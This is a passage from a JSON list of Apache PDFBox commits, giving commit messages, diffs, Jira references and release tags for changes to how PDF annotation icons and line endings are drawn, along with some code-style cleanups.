(PDAnnotationLine.LE_R_CLOSED_ARROW.equals(startPointEndingStyle))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_SLASH:", + "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "- cs.moveTo((float) (Math.cos(Math.toRadians(60)) * ab.width * 9),", + "- y + (float) (Math.sin(Math.toRadians(60)) * ab.width * 9));", + "- cs.lineTo((float) (Math.cos(Math.toRadians(240)) * ab.width * 9),", + "- y + (float) (Math.sin(Math.toRadians(240)) * ab.width * 9));", + "- break;", + "- default:", + "- break;", + "+ // ending", + "+ drawArrow(cs, x - width, y, -width * 9);", + " }", + "- if (INTERIOR_COLOR_STYLES.contains(startPointEndingStyle))", + "+ else", + " {", + "- cs.drawShape(ab.width, hasStroke, hasBackground);", + "+ // start", + "+ drawArrow(cs, width, y, width * 9);", + " }", + "- else if (!PDAnnotationLine.LE_NONE.equals(startPointEndingStyle))", + "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", + " {", + "- // need to do this separately, because sometimes /IC is set anyway", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.closePath();", + " }", + "-", + "- String endPointEndingStyle = annotation.getEndPointEndingStyle();", + "- switch (endPointEndingStyle)", + "+ break;", + "+ case PDAnnotationLine.LE_BUTT:", + "+ cs.moveTo(x, y - width * 3);", + "+ cs.lineTo(x, y + width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_DIAMOND:", + "+ drawDiamond(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_SQUARE:", + "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", + "+ break;", + "+ case PDAnnotationLine.LE_CIRCLE:", + "+ addCircle(cs, x, y, width * 3);", + "+ break;", + "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + " {", + "- case PDAnnotationLine.LE_OPEN_ARROW:", + "- case PDAnnotationLine.LE_CLOSED_ARROW:", + "- drawArrow(cs, lineLength - ab.width, y, -ab.width * 9);", + "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(endPointEndingStyle))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_BUTT:", + "- cs.moveTo(lineLength, y - ab.width * 3);", + "- cs.lineTo(lineLength, y + ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_DIAMOND:", + "- drawDiamond(cs, lineLength, y, ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_SQUARE:", + "- cs.addRect(lineLength - ab.width * 3, y - ab.width * 3, ab.width * 6, ab.width * 6);", + "- break;", + "- case PDAnnotationLine.LE_CIRCLE:", + "- addCircle(cs, lineLength, y, ab.width * 3);", + "- break;", + "- case PDAnnotationLine.LE_R_OPEN_ARROW:", + "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", + "- drawArrow(cs, lineLength + ab.width, y, ab.width * 9);", + "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(endPointEndingStyle))", + "- {", + "- cs.closePath();", + "- }", + "- break;", + "- case PDAnnotationLine.LE_SLASH:", + "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "- cs.moveTo(lineLength + (float) (Math.cos(Math.toRadians(60)) * ab.width * 9),", + "- y + (float) (Math.sin(Math.toRadians(60)) * ab.width * 9));", + "- cs.lineTo(lineLength + (float) (Math.cos(Math.toRadians(240)) * ab.width * 9),", + "- y + (float) (Math.sin(Math.toRadians(240)) * ab.width * 9));", + "- break;", + "- default:", + "- break;", + "+ // ending", + "+ drawArrow(cs, x + width, y, width * 9);", + " }", + "- if (INTERIOR_COLOR_STYLES.contains(endPointEndingStyle))", + "+ else", + " {", + "- cs.drawShape(ab.width, hasStroke, hasBackground);", + "+ // start", + "+ drawArrow(cs, -width, y, -width * 9);", + " }", + "- else if (!PDAnnotationLine.LE_NONE.equals(endPointEndingStyle))", + "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", + " {", + "- // need to do this separately, because sometimes /IC is set anyway", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.closePath();", + " }", + "- }", + "+ break;", + "+ case PDAnnotationLine.LE_SLASH:", + "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", + "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", + "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", + "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", + "+ break;", + "+ default:", + "+ break;", + " }", + "- catch (IOException ex)", + "+ if (INTERIOR_COLOR_STYLES.contains(style))", + " {", + "- LOG.error(ex);", + "+ cs.drawShape(width, hasStroke, hasBackground);", + "+ }", + "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", + "+ {", + "+ // need to do this separately, because sometimes /IC is set anyway", + "+ cs.drawShape(width, hasStroke, false);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "67925623ac739bc262f3d0c30cbc6fbb175eba1e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528481576, + "hunks": 3, + "message": "PDFBOX-3353: add constant for /Circle git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833198 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "index 9576df314..7311feaec 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "@@ -71,2 +71,7 @@ public class PDAnnotationText extends PDAnnotationMarkup", + "+ /**", + "+ * Constant for the name of a circle annotation.", + "+ */", + "+ public static final String NAME_CIRCLE = \"Circle\";", + "+", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index a4d003c6c..9f6772fab 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -55,3 +55,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", + "- !\"Circle\".equals(annotation.getName()))", + "+ !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", + " {", + "@@ -86,3 +86,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "- case \"Circle\": //TODO constant", + "+ case PDAnnotationText.NAME_CIRCLE:", + " drawCircles(contentStream, bbox);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "28bb54800e4339b0a1a44dce7b628ca77ba57bc9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530117361, + "hunks": 3, + "message": "PDFBOX-3353: correct drawing of /Paragraph, no donut effect there git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834520 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 6cc503e4a..2a9eeabf6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -342,3 +342,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", + " private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "@@ -380,5 +379,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.restoreGraphicsState();", + "- // draw the outer circle counterclockwise to fill area between circle and \"?\"", + "- drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + " contentStream.fillAndStroke();", + "+ drawCircle(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.stroke();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "ff7eec4f24f6ec5aafa58ec11f9a0f6901bda5b7", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530728360, + "hunks": 1, + "message": "PDFBOX-4071: remove unused import git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835075 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "index ec521ad01..69d9e6384 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "@@ -20,3 +20,2 @@ import java.awt.geom.GeneralPath;", + " import java.io.File;", + "-import java.io.FileInputStream;", + " import java.io.IOException;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "d227e0f677b3244c1f39dcd6c58e19993feea58e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528632673, + "hunks": 10, + "message": "PDFBOX-3353: support /Help git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833278 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index aeaf70abe..41e9a55b1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -17,3 +17,8 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+import java.awt.geom.AffineTransform;", + "+import java.awt.geom.GeneralPath;", + "+import java.awt.geom.PathIterator;", + " import java.io.IOException;", + "+import java.util.HashSet;", + "+import java.util.Set;", + " import org.apache.commons.logging.Log;", + "@@ -22,2 +27,3 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.font.PDType1Font;", + " import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", + "@@ -27,2 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", + "+import org.apache.pdfbox.util.Matrix;", + "@@ -36,2 +43,13 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private static final Set SUPPORTED_NAMES = new HashSet<>();", + "+", + "+ static", + "+ {", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_NOTE);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_INSERT);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_HELP);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CIRCLE);", + "+ }", + "+", + " public PDTextAppearanceHandler(PDAnnotation annotation)", + "@@ -53,8 +71,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", + "- if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()) &&", + "- !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", + "- !PDAnnotationText.NAME_CROSS.equals(annotation.getName()) &&", + "- !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", + "+ if (!SUPPORTED_NAMES.contains(annotation.getName()))", + " {", + "- //TODO Comment, Key, Help, NewParagraph, Paragraph", + "+ //TODO Comment, Key, NewParagraph, Paragraph", + " return;", + "@@ -77,3 +92,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " setOpacity(contentStream, annotation.getConstantOpacity());", + "- ", + "+", + " PDRectangle rect = getRectangle();", + "@@ -96,3 +111,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "-", + "+ case PDAnnotationText.NAME_HELP:", + "+ drawHelp(contentStream, bbox);", + "+ break;", + " default:", + "@@ -206,2 +223,70 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawHelp(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ throws IOException", + "+ {", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ // Adobe first fills a white circle with CA ca 0.6, so do we", + "+ contentStream.saveGraphicsState();", + "+ contentStream.setLineWidth(1);", + "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", + "+ gs.setAlphaSourceFlag(false);", + "+ gs.setStrokingAlphaConstant(0.6f);", + "+ gs.setNonStrokingAlphaConstant(0.6f);", + "+ gs.setBlendMode(BlendMode.NORMAL);", + "+ contentStream.setGraphicsStateParameters(gs);", + "+ contentStream.setNonStrokingColor(1f);", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fill();", + "+ contentStream.restoreGraphicsState();", + "+", + "+ contentStream.saveGraphicsState();", + "+ // rescale so that \"?\" fits into circle and move \"?\" to circle center", + "+ // values gathered by trial and error", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", + "+ contentStream.transform(Matrix.getTranslateInstance(540, 375));", + "+", + "+ // we get the shape of an Helvetica \"?\" and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", + "+ PathIterator it = path.getPathIterator(new AffineTransform());", + "+ double[] coords = new double[6];", + "+ while (!it.isDone())", + "+ {", + "+ int type = it.currentSegment(coords);", + "+ switch (type)", + "+ {", + "+ case PathIterator.SEG_CLOSE:", + "+ contentStream.closePath();", + "+ break;", + "+ case PathIterator.SEG_CUBICTO:", + "+ contentStream.curveTo((float) coords[0], (float) coords[1], (float) coords[2],", + "+ (float) coords[3], (float) coords[4], (float) coords[5]);", + "+ break;", + "+ case PathIterator.SEG_QUADTO:", + "+ contentStream.curveTo1((float) coords[0], (float) coords[1], (float) coords[2], (float) coords[3]);", + "+ // not sure whether curveTo1 or curveTo2 is to be used here", + "+ break;", + "+ case PathIterator.SEG_LINETO:", + "+ contentStream.lineTo((float) coords[0], (float) coords[1]);", + "+ break;", + "+ case PathIterator.SEG_MOVETO:", + "+ contentStream.moveTo((float) coords[0], (float) coords[1]);", + "+ break;", + "+ default:", + "+ break;", + "+ }", + "+ it.next();", + "+ }", + "+ contentStream.restoreGraphicsState();", + "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + " @Override" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "c124b3f87812f47614db0b620453ab7012167762", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524335986, + "hunks": 7, + "message": "PDFBOX-4189: Sonar fixes: use try-with-resources, use private constructor, reformat, use diamond git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829739 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index 221549918..915cd09a4 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -41,2 +41,5 @@ public class BengaliPdfGenerationHelloWorld", + " {", + "+ private BengaliPdfGenerationHelloWorld()", + "+ { ", + "+ }", + "@@ -75,6 +78,4 @@ public class BengaliPdfGenerationHelloWorld", + "- PDDocument doc = new PDDocument();", + "- try", + "+ try (PDDocument doc = new PDDocument())", + " {", + "-", + " PDPage page1 = new PDPage();", + "@@ -86,21 +87,22 @@ public class BengaliPdfGenerationHelloWorld", + "- PDPageContentStream contents = new PDPageContentStream(doc, page1);", + "- contents.beginText();", + "- contents.setFont(font, 12);", + "- contents.newLineAtOffset(10, 750);", + "- contents.showText(BANGLA_TEXT_1);", + "- contents.newLineAtOffset(0, -50);", + "- contents.showText(BANGLA_TEXT_2);", + "- contents.newLineAtOffset(0, -30);", + "- contents.showText(BANGLA_TEXT_3);", + "- contents.endText();", + "-", + "- PDImageXObject pdImage = PDImageXObject", + "- .createFromFile(BengaliPdfGenerationHelloWorld.class", + "- .getResource(", + "- \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", + "- // getFile() doesn't work if there is a space in the path", + "- .toURI().getPath(), doc);", + "- contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", + "- contents.close();", + "+ try (PDPageContentStream contents = new PDPageContentStream(doc, page1))", + "+ {", + "+ contents.beginText();", + "+ contents.setFont(font, 12);", + "+ contents.newLineAtOffset(10, 750);", + "+ contents.showText(BANGLA_TEXT_1);", + "+ contents.newLineAtOffset(0, -50);", + "+ contents.showText(BANGLA_TEXT_2);", + "+ contents.newLineAtOffset(0, -30);", + "+ contents.showText(BANGLA_TEXT_3);", + "+ contents.endText();", + "+ ", + "+ PDImageXObject pdImage = PDImageXObject", + "+ .createFromFile(BengaliPdfGenerationHelloWorld.class", + "+ .getResource(", + "+ \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", + "+ // getFile() doesn't work if there is a space in the path", + "+ .toURI().getPath(), doc);", + "+ contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", + "+ }", + "@@ -108,6 +110,2 @@ public class BengaliPdfGenerationHelloWorld", + " }", + "- finally", + "- {", + "- doc.close();", + "- }", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "index 1986d0dbd..bdb8adc91 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "@@ -268,4 +268,3 @@ public class GlyphSubstitutionTable extends TTFTable", + " {", + "- subTables[i] = readLigatureSubstitutionSubtable(data,", + "- offset + subTableOffets[i]);", + "+ subTables[i] = readLigatureSubstitutionSubtable(data, offset + subTableOffets[i]);", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "index e24828d1b..41a5e652e 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "@@ -49,3 +49,3 @@ public class CompoundCharacterTokenizer", + " {", + "- List tokens = new ArrayList();", + "+ List tokens = new ArrayList<>();" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "570778fc1a920ba02d31dbeab671efe78a275f7b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529612758, + "hunks": 6, + "message": "PDFBOX-3353: support /Star, /Check, /RightArrow and /RightPointer git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834053 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "index 6d234de46..913c49a0e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "@@ -80,2 +80,22 @@ public class PDAnnotationText extends PDAnnotationMarkup", + " public static final String NAME_CROSS = \"Cross\";", + "+ ", + "+ /**", + "+ * Constant for the name of a star annotation.", + "+ */", + "+ public static final String NAME_STAR = \"Star\";", + "+", + "+ /**", + "+ * Constant for the name of a check annotation.", + "+ */", + "+ public static final String NAME_CHECK = \"Check\";", + "+", + "+ /**", + "+ * Constant for the name of a right arrow annotation.", + "+ */", + "+ public static final String NAME_RIGHT_ARROW = \"RightArrow\";", + "+", + "+ /**", + "+ * Constant for the name of a right pointer annotation.", + "+ */", + "+ public static final String NAME_RIGHT_POINTER = \"RightPointer\"; ", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 6211ffe18..5424c61b5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -55,2 +55,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " SUPPORTED_NAMES.add(PDAnnotationText.NAME_NEW_PARAGRAPH);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CHECK);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_STAR);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_ARROW);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_POINTER);", + " }", + "@@ -122,2 +126,14 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "+ case PDAnnotationText.NAME_STAR:", + "+ drawStar(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_CHECK:", + "+ drawCheck(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_RIGHT_ARROW:", + "+ drawRightArrow(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_RIGHT_POINTER:", + "+ drawRightPointer(annotation, contentStream);", + "+ break;", + " default:", + "@@ -299,3 +315,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", + "- contentStream.transform(Matrix.getTranslateInstance(555, 375));", + "+ contentStream.transform(Matrix.getTranslateInstance(500, 375));", + "@@ -312,3 +328,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", + "- private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + "@@ -380,2 +396,112 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawStar(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 19);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", + "+", + "+ // we get the shape of a Zapf Dingbats star (0x2605) and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.ZAPF_DINGBATS.getPath(\"a35\");", + "+ addPath(contentStream, path);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ //TODO this is mostly identical to drawStar, except for scale, translation and symbol", + "+ private void drawCheck(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 19);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 0.8f, 0.001f * min / 0.8f));", + "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", + "+", + "+ // we get the shape of a Zapf Dingbats check (0x2714) and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + 